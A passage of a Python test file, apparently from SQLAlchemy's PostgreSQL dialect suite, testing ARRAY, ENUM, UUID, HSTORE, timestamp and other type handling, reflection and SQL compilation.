@testing.fails_on('postgresql+zxjdbc',
'zxjdbc has no support for PG arrays')
@testing.provide_metadata
def test_arrays(self):
metadata = self.metadata
t1 = Table('t', metadata,
Column('x', postgresql.ARRAY(Float)),
Column('y', postgresql.ARRAY(REAL)),
Column('z', postgresql.ARRAY(postgresql.DOUBLE_PRECISION)),
Column('q', postgresql.ARRAY(Numeric))
)
metadata.create_all()
t1.insert().execute(x=[5], y=[5], z=[6], q=[decimal.Decimal("6.4")])
row = t1.select().execute().first()
eq_(
row,
([5], [5], [6], [decimal.Decimal("6.4")])
)
class EnumTest(fixtures.TestBase, AssertsExecutionResults):
__backend__ = True
__only_on__ = 'postgresql > 8.3'
@testing.fails_on('postgresql+zxjdbc',
'zxjdbc fails on ENUM: column "XXX" is of type '
'XXX but expression is of type character varying')
def test_create_table(self):
metadata = MetaData(testing.db)
t1 = Table(
'table', metadata,
Column(
'id', Integer, primary_key=True),
Column(
'value', Enum(
'one', 'two', 'three', name='onetwothreetype')))
t1.create()
t1.create(checkfirst=True) # check the create
try:
t1.insert().execute(value='two')
t1.insert().execute(value='three')
t1.insert().execute(value='three')
eq_(t1.select().order_by(t1.c.id).execute().fetchall(),
[(1, 'two'), (2, 'three'), (3, 'three')])
finally:
metadata.drop_all()
metadata.drop_all()
def test_name_required(self):
metadata = MetaData(testing.db)
etype = Enum('four', 'five', 'six', metadata=metadata)
assert_raises(exc.CompileError, etype.create)
assert_raises(exc.CompileError, etype.compile,
dialect=postgresql.dialect())
@testing.fails_on('postgresql+zxjdbc',
'zxjdbc fails on ENUM: column "XXX" is of type '
'XXX but expression is of type character varying')
@testing.provide_metadata
def test_unicode_labels(self):
metadata = self.metadata
t1 = Table(
'table',
metadata,
Column(
'id',
Integer,
primary_key=True),
Column(
'value',
Enum(
util.u('réveillé'),
util.u('drôle'),
util.u('S’il'),
name='onetwothreetype')))
metadata.create_all()
t1.insert().execute(value=util.u('drôle'))
t1.insert().execute(value=util.u('réveillé'))
t1.insert().execute(value=util.u('S’il'))
eq_(t1.select().order_by(t1.c.id).execute().fetchall(),
[(1, util.u('drôle')), (2, util.u('réveillé')),
(3, util.u('S’il'))]
)
m2 = MetaData(testing.db)
t2 = Table('table', m2, autoload=True)
eq_(
t2.c.value.type.enums,
(util.u('réveillé'), util.u('drôle'), util.u('S’il'))
)
@testing.provide_metadata
def test_non_native_enum(self):
metadata = self.metadata
t1 = Table(
'foo',
metadata,
Column(
'bar',
Enum(
'one',
'two',
'three',
name='myenum',
native_enum=False)))
def go():
t1.create(testing.db)
self.assert_sql(
testing.db, go, [
("CREATE TABLE foo (\tbar "
"VARCHAR(5), \tCONSTRAINT myenum CHECK "
"(bar IN ('one', 'two', 'three')))", {})])
with testing.db.begin() as conn:
conn.execute(
t1.insert(), {'bar': 'two'}
)
eq_(
conn.scalar(select([t1.c.bar])), 'two'
)
@testing.provide_metadata
def test_non_native_enum_w_unicode(self):
metadata = self.metadata
t1 = Table(
'foo',
metadata,
Column(
'bar',
Enum('B', util.u('Ü'), name='myenum', native_enum=False)))
def go():
t1.create(testing.db)
self.assert_sql(
testing.db,
go,
[
(
util.u(
"CREATE TABLE foo (\tbar "
"VARCHAR(1), \tCONSTRAINT myenum CHECK "
"(bar IN ('B', 'Ü')))"
),
{}
)
])
with testing.db.begin() as conn:
conn.execute(
t1.insert(), {'bar': util.u('Ü')}
)
eq_(
conn.scalar(select([t1.c.bar])), util.u('Ü')
)
@testing.provide_metadata
def test_disable_create(self):
metadata = self.metadata
e1 = postgresql.ENUM('one', 'two', 'three',
name="myenum",
create_type=False)
t1 = Table('e1', metadata,
Column('c1', e1)
)
# table can be created separately
# without conflict
e1.create(bind=testing.db)
t1.create(testing.db)
t1.drop(testing.db)
e1.drop(bind=testing.db)
@testing.provide_metadata
def test_generate_multiple(self):
"""Test that the same enum twice only generates once
for the create_all() call, without using checkfirst.
A 'memo' collection held by the DDL runner
now handles this.
"""
metadata = self.metadata
e1 = Enum('one', 'two', 'three',
name="myenum")
t1 = Table('e1', metadata,
Column('c1', e1)
)
t2 = Table('e2', metadata,
Column('c1', e1)
)
metadata.create_all(checkfirst=False)
metadata.drop_all(checkfirst=False)
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
@testing.provide_metadata
def test_generate_alone_on_metadata(self):
"""Test that the same enum twice only generates once
for the create_all() call, without using checkfirst.
A 'memo' collection held by the DDL runner
now handles this.
"""
metadata = self.metadata
e1 = Enum('one', 'two', 'three',
name="myenum", metadata=self.metadata)
metadata.create_all(checkfirst=False)
assert 'myenum' in [
e['name'] for e in inspect(testing.db).get_enums()]
metadata.drop_all(checkfirst=False)
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
@testing.provide_metadata
def test_generate_multiple_on_metadata(self):
metadata = self.metadata
e1 = Enum('one', 'two', 'three',
name="myenum", metadata=metadata)
t1 = Table('e1', metadata,
Column('c1', e1)
)
t2 = Table('e2', metadata,
Column('c1', e1)
)
metadata.create_all(checkfirst=False)
assert 'myenum' in [
e['name'] for e in inspect(testing.db).get_enums()]
metadata.drop_all(checkfirst=False)
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
e1.create() # creates ENUM
t1.create() # does not create ENUM
t2.create() # does not create ENUM
@testing.provide_metadata
def test_drops_on_table(self):
metadata = self.metadata
e1 = Enum('one', 'two', 'three',
name="myenum")
table = Table(
'e1', metadata,
Column('c1', e1)
)
table.create()
table.drop()
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
table.create()
assert 'myenum' in [
e['name'] for e in inspect(testing.db).get_enums()]
table.drop()
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
@testing.provide_metadata
def test_remain_on_table_metadata_wide(self):
metadata = self.metadata
e1 = Enum('one', 'two', 'three',
name="myenum", metadata=metadata)
table = Table(
'e1', metadata,
Column('c1', e1)
)
# need checkfirst here, otherwise enum will not be created
assert_raises_message(
sa.exc.ProgrammingError,
'.*type "myenum" does not exist',
table.create,
)
table.create(checkfirst=True)
table.drop()
table.create(checkfirst=True)
table.drop()
assert 'myenum' in [
e['name'] for e in inspect(testing.db).get_enums()]
metadata.drop_all()
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
def test_non_native_dialect(self):
engine = engines.testing_engine()
engine.connect()
engine.dialect.supports_native_enum = False
metadata = MetaData()
t1 = Table(
'foo',
metadata,
Column(
'bar',
Enum(
'one',
'two',
'three',
name='myenum')))
def go():
t1.create(engine)
try:
self.assert_sql(
engine, go, [
("CREATE TABLE foo (bar "
"VARCHAR(5), CONSTRAINT myenum CHECK "
"(bar IN ('one', 'two', 'three')))", {})])
finally:
metadata.drop_all(engine)
def test_standalone_enum(self):
metadata = MetaData(testing.db)
etype = Enum('four', 'five', 'six', name='fourfivesixtype',
metadata=metadata)
etype.create()
try:
assert testing.db.dialect.has_type(testing.db,
'fourfivesixtype')
finally:
etype.drop()
assert not testing.db.dialect.has_type(testing.db,
'fourfivesixtype')
metadata.create_all()
try:
assert testing.db.dialect.has_type(testing.db,
'fourfivesixtype')
finally:
metadata.drop_all()
assert not testing.db.dialect.has_type(testing.db,
'fourfivesixtype')
def test_no_support(self):
def server_version_info(self):
return (8, 2)
e = engines.testing_engine()
dialect = e.dialect
dialect._get_server_version_info = server_version_info
assert dialect.supports_native_enum
e.connect()
assert not dialect.supports_native_enum
# initialize is called again on new pool
e.dispose()
e.connect()
assert not dialect.supports_native_enum
def test_reflection(self):
metadata = MetaData(testing.db)
etype = Enum('four', 'five', 'six', name='fourfivesixtype',
metadata=metadata)
t1 = Table(
'table', metadata,
Column(
'id', Integer, primary_key=True),
Column(
'value', Enum(
'one', 'two', 'three', name='onetwothreetype')),
Column('value2', etype))
metadata.create_all()
try:
m2 = MetaData(testing.db)
t2 = Table('table', m2, autoload=True)
assert t2.c.value.type.enums == ('one', 'two', 'three')
assert t2.c.value.type.name == 'onetwothreetype'
assert t2.c.value2.type.enums == ('four', 'five', 'six')
assert t2.c.value2.type.name == 'fourfivesixtype'
finally:
metadata.drop_all()
def test_schema_reflection(self):
metadata = MetaData(testing.db)
etype = Enum(
'four',
'five',
'six',
name='fourfivesixtype',
schema='test_schema',
metadata=metadata,
)
t1 = Table(
'table', metadata,
Column(
'id', Integer, primary_key=True),
Column(
'value', Enum(
'one', 'two', 'three',
name='onetwothreetype', schema='test_schema')),
Column('value2', etype))
metadata.create_all()
try:
m2 = MetaData(testing.db)
t2 = Table('table', m2, autoload=True)
assert t2.c.value.type.enums == ('one', 'two', 'three')
assert t2.c.value.type.name == 'onetwothreetype'
assert t2.c.value2.type.enums == ('four', 'five', 'six')
assert t2.c.value2.type.name == 'fourfivesixtype'
assert t2.c.value2.type.schema == 'test_schema'
finally:
metadata.drop_all()
class OIDTest(fixtures.TestBase):
__only_on__ = 'postgresql'
__backend__ = True
@testing.provide_metadata
def test_reflection(self):
metadata = self.metadata
Table('table', metadata, Column('x', Integer),
Column('y', postgresql.OID))
metadata.create_all()
m2 = MetaData()
t2 = Table('table', m2, autoload_with=testing.db, autoload=True)
assert isinstance(t2.c.y.type, postgresql.OID)
class NumericInterpretationTest(fixtures.TestBase):
__only_on__ = 'postgresql'
__backend__ = True
def test_numeric_codes(self):
from sqlalchemy.dialects.postgresql import psycopg2cffi, pg8000, \
psycopg2, base
dialects = (pg8000.dialect(), psycopg2.dialect(),
psycopg2cffi.dialect())
for dialect in dialects:
typ = Numeric().dialect_impl(dialect)
for code in base._INT_TYPES + base._FLOAT_TYPES + \
base._DECIMAL_TYPES:
proc = typ.result_processor(dialect, code)
val = 23.7
if proc is not None:
val = proc(val)
assert val in (23.7, decimal.Decimal("23.7"))
@testing.provide_metadata
def test_numeric_default(self):
metadata = self.metadata
# pg8000 appears to fail when the value is 0,
# returns an int instead of decimal.
t = Table('t', metadata,
Column('id', Integer, primary_key=True),
Column('nd', Numeric(asdecimal=True), default=1),
Column('nf', Numeric(asdecimal=False), default=1),
Column('fd', Float(asdecimal=True), default=1),
Column('ff', Float(asdecimal=False), default=1),
)
metadata.create_all()
r = t.insert().execute()
row = t.select().execute().first()
assert isinstance(row[1], decimal.Decimal)
assert isinstance(row[2], float)
assert isinstance(row[3], decimal.Decimal)
assert isinstance(row[4], float)
eq_(
row,
(1, decimal.Decimal("1"), 1, decimal.Decimal("1"), 1)
)
class TimezoneTest(fixtures.TestBase):
__backend__ = True
"""Test timezone-aware datetimes.
psycopg will return a datetime with a tzinfo attached to it, if
postgresql returns it. python then will not let you compare a
datetime with a tzinfo to a datetime that doesn't have one. this
test illustrates two ways to have datetime types with and without
timezone info. """
__only_on__ = 'postgresql'
@classmethod
def setup_class(cls):
global tztable, notztable, metadata
metadata = MetaData(testing.db)
# current_timestamp() in postgresql is assumed to return
# TIMESTAMP WITH TIMEZONE
tztable = Table(
'tztable', metadata,
Column(
'id', Integer, primary_key=True),
Column(
'date', DateTime(
timezone=True), onupdate=func.current_timestamp()),
Column('name', String(20)))
notztable = Table(
'notztable', metadata,
Column(
'id', Integer, primary_key=True),
Column(
'date', DateTime(
timezone=False), onupdate=cast(
func.current_timestamp(), DateTime(
timezone=False))),
Column('name', String(20)))
metadata.create_all()
@classmethod
def teardown_class(cls):
metadata.drop_all()
@testing.fails_on('postgresql+zxjdbc',
"XXX: postgresql+zxjdbc doesn't give a tzinfo back")
def test_with_timezone(self):
# get a date with a tzinfo
somedate = \
testing.db.connect().scalar(func.current_timestamp().select())
assert somedate.tzinfo
tztable.insert().execute(id=1, name='row1', date=somedate)
row = select([tztable.c.date], tztable.c.id
== 1).execute().first()
eq_(row[0], somedate)
eq_(somedate.tzinfo.utcoffset(somedate),
row[0].tzinfo.utcoffset(row[0]))
result = tztable.update(tztable.c.id
== 1).returning(tztable.c.date).\
execute(name='newname'
)
row = result.first()
assert row[0] >= somedate
def test_without_timezone(self):
# get a date without a tzinfo
somedate = datetime.datetime(2005, 10, 20, 11, 52, 0, )
assert not somedate.tzinfo
notztable.insert().execute(id=1, name='row1', date=somedate)
row = select([notztable.c.date], notztable.c.id
== 1).execute().first()
eq_(row[0], somedate)
eq_(row[0].tzinfo, None)
result = notztable.update(notztable.c.id
== 1).returning(notztable.c.date).\
execute(name='newname'
)
row = result.first()
assert row[0] >= somedate
class TimePrecisionTest(fixtures.TestBase, AssertsCompiledSQL):
__dialect__ = postgresql.dialect()
__prefer__ = 'postgresql'
__backend__ = True
def test_compile(self):
for type_, expected in [
(postgresql.TIME(), 'TIME WITHOUT TIME ZONE'),
(postgresql.TIME(precision=5), 'TIME(5) WITHOUT TIME ZONE'
),
(postgresql.TIME(timezone=True, precision=5),
'TIME(5) WITH TIME ZONE'),
(postgresql.TIMESTAMP(), 'TIMESTAMP WITHOUT TIME ZONE'),
(postgresql.TIMESTAMP(precision=5),
'TIMESTAMP(5) WITHOUT TIME ZONE'),
(postgresql.TIMESTAMP(timezone=True, precision=5),
'TIMESTAMP(5) WITH TIME ZONE'),
]:
self.assert_compile(type_, expected)
@testing.only_on('postgresql', 'DB specific feature')
@testing.provide_metadata
def test_reflection(self):
metadata = self.metadata
t1 = Table(
't1',
metadata,
Column('c1', postgresql.TIME()),
Column('c2', postgresql.TIME(precision=5)),
Column('c3', postgresql.TIME(timezone=True, precision=5)),
Column('c4', postgresql.TIMESTAMP()),
Column('c5', postgresql.TIMESTAMP(precision=5)),
Column('c6', postgresql.TIMESTAMP(timezone=True,
precision=5)),
)
t1.create()
m2 = MetaData(testing.db)
t2 = Table('t1', m2, autoload=True)
eq_(t2.c.c1.type.precision, None)
eq_(t2.c.c2.type.precision, 5)
eq_(t2.c.c3.type.precision, 5)
eq_(t2.c.c4.type.precision, None)
eq_(t2.c.c5.type.precision, 5)
eq_(t2.c.c6.type.precision, 5)
eq_(t2.c.c1.type.timezone, False)
eq_(t2.c.c2.type.timezone, False)
eq_(t2.c.c3.type.timezone, True)
eq_(t2.c.c4.type.timezone, False)
eq_(t2.c.c5.type.timezone, False)
eq_(t2.c.c6.type.timezone, True)
class ArrayTest(fixtures.TablesTest, AssertsExecutionResults):
__only_on__ = 'postgresql'
__backend__ = True
__unsupported_on__ = 'postgresql+pg8000', 'postgresql+zxjdbc'
@classmethod
def define_tables(cls, metadata):
class ProcValue(TypeDecorator):
impl = postgresql.ARRAY(Integer, dimensions=2)
def process_bind_param(self, value, dialect):
if value is None:
return None
return [
[x + 5 for x in v]
for v in value
]
def process_result_value(self, value, dialect):
if value is None:
return None
return [
[x - 7 for x in v]
for v in value
]
Table('arrtable', metadata,
Column('id', Integer, primary_key=True),
Column('intarr', postgresql.ARRAY(Integer)),
Column('strarr', postgresql.ARRAY(Unicode())),
Column('dimarr', ProcValue)
)
Table('dim_arrtable', metadata,
Column('id', Integer, primary_key=True),
Column('intarr', postgresql.ARRAY(Integer, dimensions=1)),
Column('strarr', postgresql.ARRAY(Unicode(), dimensions=1)),
Column('dimarr', ProcValue)
)
def _fixture_456(self, table):
testing.db.execute(
table.insert(),
intarr=[4, 5, 6]
)
def test_reflect_array_column(self):
metadata2 = MetaData(testing.db)
tbl = Table('arrtable', metadata2, autoload=True)
assert isinstance(tbl.c.intarr.type, postgresql.ARRAY)
assert isinstance(tbl.c.strarr.type, postgresql.ARRAY)
assert isinstance(tbl.c.intarr.type.item_type, Integer)
assert isinstance(tbl.c.strarr.type.item_type, String)
def test_insert_array(self):
arrtable = self.tables.arrtable
arrtable.insert().execute(intarr=[1, 2, 3], strarr=[util.u('abc'),
util.u('def')])
results = arrtable.select().execute().fetchall()
eq_(len(results), 1)
eq_(results[0]['intarr'], [1, 2, 3])
eq_(results[0]['strarr'], [util.u('abc'), util.u('def')])
def test_array_where(self):
arrtable = self.tables.arrtable
arrtable.insert().execute(intarr=[1, 2, 3], strarr=[util.u('abc'),
util.u('def')])
arrtable.insert().execute(intarr=[4, 5, 6], strarr=util.u('ABC'))
results = arrtable.select().where(
arrtable.c.intarr == [
1,
2,
3]).execute().fetchall()
eq_(len(results), 1)
eq_(results[0]['intarr'], [1, 2, 3])
def test_array_concat(self):
arrtable = self.tables.arrtable
arrtable.insert().execute(intarr=[1, 2, 3],
strarr=[util.u('abc'), util.u('def')])
results = select([arrtable.c.intarr + [4, 5,
6]]).execute().fetchall()
eq_(len(results), 1)
eq_(results[0][0], [1, 2, 3, 4, 5, 6, ])
def test_array_comparison(self):
arrtable = self.tables.arrtable
arrtable.insert().execute(intarr=[1, 2, 3],
strarr=[util.u('abc'), util.u('def')])
results = select([arrtable.c.id]).\
where(arrtable.c.intarr < [4, 5, 6]).execute()\
.fetchall()
eq_(len(results), 1)
eq_(results[0][0], 3)
def test_array_subtype_resultprocessor(self):
arrtable = self.tables.arrtable
arrtable.insert().execute(intarr=[4, 5, 6],
strarr=[[util.ue('m\xe4\xe4')], [
util.ue('m\xf6\xf6')]])
arrtable.insert().execute(intarr=[1, 2, 3], strarr=[
util.ue('m\xe4\xe4'), util.ue('m\xf6\xf6')])
results = \
arrtable.select(order_by=[arrtable.c.intarr]).execute().fetchall()
eq_(len(results), 2)
eq_(results[0]['strarr'], [util.ue('m\xe4\xe4'), util.ue('m\xf6\xf6')])
eq_(results[1]['strarr'],
[[util.ue('m\xe4\xe4')],
[util.ue('m\xf6\xf6')]])
def test_array_literal(self):
eq_(
testing.db.scalar(
select([
postgresql.array([1, 2]) + postgresql.array([3, 4, 5])
])
), [1, 2, 3, 4, 5]
)
def test_array_literal_compare(self):
eq_(
testing.db.scalar(
select([
postgresql.array([1, 2]) < [3, 4, 5]
])
), True
)
def test_array_getitem_single_type(self):
arrtable = self.tables.arrtable
is_(arrtable.c.intarr[1].type._type_affinity, Integer)
is_(arrtable.c.strarr[1].type._type_affinity, String)
def test_array_getitem_slice_type(self):
arrtable = self.tables.arrtable
is_(arrtable.c.intarr[1:3].type._type_affinity, postgresql.ARRAY)
is_(arrtable.c.strarr[1:3].type._type_affinity, postgresql.ARRAY)
def test_array_getitem_single_exec(self):
arrtable = self.tables.arrtable
self._fixture_456(arrtable)
eq_(
testing.db.scalar(select([arrtable.c.intarr[2]])),
5
)
testing.db.execute(
arrtable.update().values({arrtable.c.intarr[2]: 7})
)
eq_(
testing.db.scalar(select([arrtable.c.intarr[2]])),
7
)
def test_undim_array_empty(self):
arrtable = self.tables.arrtable
self._fixture_456(arrtable)
eq_(
testing.db.scalar(
select([arrtable.c.intarr]).
where(arrtable.c.intarr.contains([]))
),
[4, 5, 6]
)
def test_array_getitem_slice_exec(self):
arrtable = self.tables.arrtable
testing.db.execute(
arrtable.insert(),
intarr=[4, 5, 6],
strarr=[util.u('abc'), util.u('def')]
)
eq_(
testing.db.scalar(select([arrtable.c.intarr[2:3]])),
[5, 6]
)
testing.db.execute(
arrtable.update().values({arrtable.c.intarr[2:3]: [7, 8]})
)
eq_(
testing.db.scalar(select([arrtable.c.intarr[2:3]])),
[7, 8]
)
def _test_undim_array_contains_typed_exec(self, struct):
arrtable = self.tables.arrtable
self._fixture_456(arrtable)
eq_(
testing.db.scalar(
select([arrtable.c.intarr]).
where(arrtable.c.intarr.contains(struct([4, 5])))
),
[4, 5, 6]
)
def test_undim_array_contains_set_exec(self):
self._test_undim_array_contains_typed_exec(set)
def test_undim_array_contains_list_exec(self):
self._test_undim_array_contains_typed_exec(list)
def test_undim_array_contains_generator_exec(self):
self._test_undim_array_contains_typed_exec(
lambda elem: (x for x in elem))
def _test_dim_array_contains_typed_exec(self, struct):
dim_arrtable = self.tables.dim_arrtable
self._fixture_456(dim_arrtable)
eq_(
testing.db.scalar(
select([dim_arrtable.c.intarr]).
where(dim_arrtable.c.intarr.contains(struct([4, 5])))
),
[4, 5, 6]
)
def test_dim_array_contains_set_exec(self):
self._test_dim_array_contains_typed_exec(set)
def test_dim_array_contains_list_exec(self):
self._test_dim_array_contains_typed_exec(list)
def test_dim_array_contains_generator_exec(self):
self._test_dim_array_contains_typed_exec(
lambda elem: (
x for x in elem))
def test_array_contained_by_exec(self):
arrtable = self.tables.arrtable
with testing.db.connect() as conn:
conn.execute(
arrtable.insert(),
intarr=[6, 5, 4]
)
eq_(
conn.scalar(
select([arrtable.c.intarr.contained_by([4, 5, 6, 7])])
),
True
)
def test_array_overlap_exec(self):
arrtable = self.tables.arrtable
with testing.db.connect() as conn:
conn.execute(
arrtable.insert(),
intarr=[4, 5, 6]
)
eq_(
conn.scalar(
select([arrtable.c.intarr]).
where(arrtable.c.intarr.overlap([7, 6]))
),
[4, 5, 6]
)
def test_array_any_exec(self):
arrtable = self.tables.arrtable
with testing.db.connect() as conn:
conn.execute(
arrtable.insert(),
intarr=[4, 5, 6]
)
eq_(
conn.scalar(
select([arrtable.c.intarr]).
where(postgresql.Any(5, arrtable.c.intarr))
),
[4, 5, 6]
)
def test_array_all_exec(self):
arrtable = self.tables.arrtable
with testing.db.connect() as conn:
conn.execute(
arrtable.insert(),
intarr=[4, 5, 6]
)
eq_(
conn.scalar(
select([arrtable.c.intarr]).
where(arrtable.c.intarr.all(4, operator=operators.le))
),
[4, 5, 6]
)
@testing.provide_metadata
def test_tuple_flag(self):
metadata = self.metadata
t1 = Table(
't1', metadata,
Column('id', Integer, primary_key=True),
Column('data', postgresql.ARRAY(String(5), as_tuple=True)),
Column(
'data2',
postgresql.ARRAY(
Numeric(asdecimal=False), as_tuple=True)
)
)
metadata.create_all()
testing.db.execute(
t1.insert(), id=1, data=[
"1", "2", "3"], data2=[
5.4, 5.6])
testing.db.execute(
t1.insert(),
id=2,
data=[
"4",
"5",
"6"],
data2=[1.0])
testing.db.execute(t1.insert(), id=3, data=[["4", "5"], ["6", "7"]],
data2=[[5.4, 5.6], [1.0, 1.1]])
r = testing.db.execute(t1.select().order_by(t1.c.id)).fetchall()
eq_(
r,
[
(1, ('1', '2', '3'), (5.4, 5.6)),
(2, ('4', '5', '6'), (1.0,)),
(3, (('4', '5'), ('6', '7')), ((5.4, 5.6), (1.0, 1.1)))
]
)
# hashable
eq_(
set(row[1] for row in r),
set([('1', '2', '3'), ('4', '5', '6'), (('4', '5'), ('6', '7'))])
)
def test_dimension(self):
arrtable = self.tables.arrtable
testing.db.execute(arrtable.insert(), dimarr=[[1, 2, 3], [4, 5, 6]])
eq_(
testing.db.scalar(select([arrtable.c.dimarr])),
[[-1, 0, 1], [2, 3, 4]]
)
class TimestampTest(fixtures.TestBase, AssertsExecutionResults):
__only_on__ = 'postgresql'
__backend__ = True
def test_timestamp(self):
engine = testing.db
connection = engine.connect()
s = select([text("timestamp '2007-12-25'")])
result = connection.execute(s).first()
eq_(result[0], datetime.datetime(2007, 12, 25, 0, 0))
class SpecialTypesTest(fixtures.TestBase, ComparesTables, AssertsCompiledSQL):
"""test DDL and reflection of PG-specific types """
__only_on__ = 'postgresql >= 8.3.0',
__backend__ = True
@classmethod
def setup_class(cls):
global metadata, table
metadata = MetaData(testing.db)
# create these types so that we can issue
# special SQL92 INTERVAL syntax
class y2m(types.UserDefinedType, postgresql.INTERVAL):
def get_col_spec(self):
return "INTERVAL YEAR TO MONTH"
class d2s(types.UserDefinedType, postgresql.INTERVAL):
def get_col_spec(self):
return "INTERVAL DAY TO SECOND"
table = Table(
'sometable', metadata,
Column(
'id', postgresql.UUID, primary_key=True),
Column(
'flag', postgresql.BIT),
Column(
'bitstring', postgresql.BIT(4)),
Column('addr', postgresql.INET),
Column('addr2', postgresql.MACADDR),
Column('addr3', postgresql.CIDR),
Column('doubleprec', postgresql.DOUBLE_PRECISION),
Column('plain_interval', postgresql.INTERVAL),
Column('year_interval', y2m()),
Column('month_interval', d2s()),
Column('precision_interval', postgresql.INTERVAL(
precision=3)),
Column('tsvector_document', postgresql.TSVECTOR))
metadata.create_all()
# cheat so that the "strict type check"
# works
table.c.year_interval.type = postgresql.INTERVAL()
table.c.month_interval.type = postgresql.INTERVAL()
@classmethod
def teardown_class(cls):
metadata.drop_all()
def test_reflection(self):
m = MetaData(testing.db)
t = Table('sometable', m, autoload=True)
self.assert_tables_equal(table, t, strict_types=True)
assert t.c.plain_interval.type.precision is None
assert t.c.precision_interval.type.precision == 3
assert t.c.bitstring.type.length == 4
def test_bit_compile(self):
pairs = [(postgresql.BIT(), 'BIT(1)'),
(postgresql.BIT(5), 'BIT(5)'),
(postgresql.BIT(varying=True), 'BIT VARYING'),
(postgresql.BIT(5, varying=True), 'BIT VARYING(5)'),
]
for type_, expected in pairs:
self.assert_compile(type_, expected)
@testing.provide_metadata
def test_tsvector_round_trip(self):
t = Table('t1', self.metadata, Column('data', postgresql.TSVECTOR))
t.create()
testing.db.execute(t.insert(), data="a fat cat sat")
eq_(testing.db.scalar(select([t.c.data])), "'a' 'cat' 'fat' 'sat'")
testing.db.execute(t.update(), data="'a' 'cat' 'fat' 'mat' 'sat'")
eq_(testing.db.scalar(select([t.c.data])),
"'a' 'cat' 'fat' 'mat' 'sat'")
@testing.provide_metadata
def test_bit_reflection(self):
metadata = self.metadata
t1 = Table('t1', metadata,
Column('bit1', postgresql.BIT()),
Column('bit5', postgresql.BIT(5)),
Column('bitvarying', postgresql.BIT(varying=True)),
Column('bitvarying5', postgresql.BIT(5, varying=True)),
)
t1.create()
m2 = MetaData(testing.db)
t2 = Table('t1', m2, autoload=True)
eq_(t2.c.bit1.type.length, 1)
eq_(t2.c.bit1.type.varying, False)
eq_(t2.c.bit5.type.length, 5)
eq_(t2.c.bit5.type.varying, False)
eq_(t2.c.bitvarying.type.length, None)
eq_(t2.c.bitvarying.type.varying, True)
eq_(t2.c.bitvarying5.type.length, 5)
eq_(t2.c.bitvarying5.type.varying, True)
class UUIDTest(fixtures.TestBase):
"""Test the bind/return values of the UUID type."""
__only_on__ = 'postgresql >= 8.3'
__backend__ = True
@testing.fails_on(
'postgresql+zxjdbc',
'column "data" is of type uuid but expression '
'is of type character varying')
@testing.fails_on('postgresql+pg8000', 'No support for UUID type')
def test_uuid_string(self):
import uuid
self._test_round_trip(
Table('utable', MetaData(),
Column('data', postgresql.UUID(as_uuid=False))
),
str(uuid.uuid4()),
str(uuid.uuid4())
)
@testing.fails_on(
'postgresql+zxjdbc',
'column "data" is of type uuid but expression is '
'of type character varying')
@testing.fails_on('postgresql+pg8000', 'No support for UUID type')
def test_uuid_uuid(self):
import uuid
self._test_round_trip(
Table('utable', MetaData(),
Column('data', postgresql.UUID(as_uuid=True))
),
uuid.uuid4(),
uuid.uuid4()
)
@testing.fails_on('postgresql+zxjdbc',
'column "data" is of type uuid[] but '
'expression is of type character varying')
@testing.fails_on('postgresql+pg8000', 'No support for UUID type')
def test_uuid_array(self):
import uuid
self._test_round_trip(
Table(
'utable', MetaData(),
Column('data', postgresql.ARRAY(postgresql.UUID(as_uuid=True)))
),
[uuid.uuid4(), uuid.uuid4()],
[uuid.uuid4(), uuid.uuid4()],
)
@testing.fails_on('postgresql+zxjdbc',
'column "data" is of type uuid[] but '
'expression is of type character varying')
@testing.fails_on('postgresql+pg8000', 'No support for UUID type')
def test_uuid_string_array(self):
import uuid
self._test_round_trip(
Table(
'utable', MetaData(),
Column(
'data',
postgresql.ARRAY(postgresql.UUID(as_uuid=False)))
),
[str(uuid.uuid4()), str(uuid.uuid4())],
[str(uuid.uuid4()), str(uuid.uuid4())],
)
def test_no_uuid_available(self):
from sqlalchemy.dialects.postgresql import base
uuid_type = base._python_UUID
base._python_UUID = None
try:
assert_raises(
NotImplementedError,
postgresql.UUID, as_uuid=True
)
finally:
base._python_UUID = uuid_type
def setup(self):
self.conn = testing.db.connect()
trans = self.conn.begin()
def teardown(self):
self.conn.close()
def _test_round_trip(self, utable, value1, value2, exp_value2=None):
utable.create(self.conn)
self.conn.execute(utable.insert(), {'data': value1})
self.conn.execute(utable.insert(), {'data': value2})
r = self.conn.execute(
select([utable.c.data]).
where(utable.c.data != value1)
)
if exp_value2:
eq_(r.fetchone()[0], exp_value2)
else:
eq_(r.fetchone()[0], value2)
eq_(r.fetchone(), None)
class HStoreTest(AssertsCompiledSQL, fixtures.TestBase):
__dialect__ = 'postgresql'
def setup(self):
metadata = MetaData()
self.test_table = Table('test_table', metadata,
Column('id', Integer, primary_key=True),
Column('hash', HSTORE)
)
self.hashcol = self.test_table.c.hash
def _test_where(self, whereclause, expected):
stmt = select([self.test_table]).where(whereclause)
self.assert_compile(
stmt,
"SELECT test_table.id, test_table.hash FROM test_table "
"WHERE %s" % expected
)
def _test_cols(self, colclause, expected, from_=True):
stmt = select([colclause])
self.assert_compile(
stmt,
(
"SELECT %s" +
(" FROM test_table" if from_ else "")
) % expected
)
def test_bind_serialize_default(self):
dialect = postgresql.dialect()
proc = self.test_table.c.hash.type._cached_bind_processor(dialect)
eq_(
proc(util.OrderedDict([("key1", "value1"), ("key2", "value2")])),
'"key1"=>"value1", "key2"=>"value2"'
)
def test_bind_serialize_with_slashes_and_quotes(self):
dialect = postgresql.dialect()
proc = self.test_table.c.hash.type._cached_bind_processor(dialect)
eq_(
proc({'\\"a': '\\"1'}),
'"\\\\\\"a"=>"\\\\\\"1"'
)
def test_parse_error(self):
dialect = postgresql.dialect()
proc = self.test_table.c.hash.type._cached_result_processor(
dialect, None)
assert_raises_message(
ValueError,
r'''After u?'\[\.\.\.\], "key1"=>"value1", ', could not parse '''
'''residual at position 36: u?'crapcrapcrap, "key3"\[\.\.\.\]''',
proc,
'"key2"=>"value2", "key1"=>"value1", '
'crapcrapcrap, "key3"=>"value3"'
)
def test_result_deserialize_default(self):
dialect = postgresql.dialect()
proc = self.test_table.c.hash.type._cached_result_processor(
dialect, None)
eq_(
proc('"key2"=>"value2", "key1"=>"value1"'),
{"key1": "value1", "key2": "value2"}
)
def test_result_deserialize_with_slashes_and_quotes(self):
dialect = postgresql.dialect()
